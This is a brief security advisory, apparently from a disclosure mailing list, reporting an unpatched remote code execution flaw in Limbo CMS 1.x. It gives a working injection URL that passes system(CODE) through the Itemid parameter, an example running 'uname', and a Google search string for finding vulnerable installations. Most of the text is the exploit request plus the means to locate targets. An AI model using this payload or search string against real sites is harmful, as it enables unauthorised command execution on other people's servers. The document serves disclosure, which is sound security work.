Limbo CMS version 1.x suffers from a remote code execution vulnerability.
9cd4f74502344d6a2967cab022ed97bae2ffa7d4d4b86384730435244580e086
Official page : http://www.limbo-cms.com/
Vulnerable : Limbo 1.*
Fix : No
Bug : http://somehost/path-to-limbo/index.php?option=frontpage&Itemid=system(CODE)
example : index.php?option=frontpage&Itemid=system(uname)
Google search string : inurl:"option=frontpage"
--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >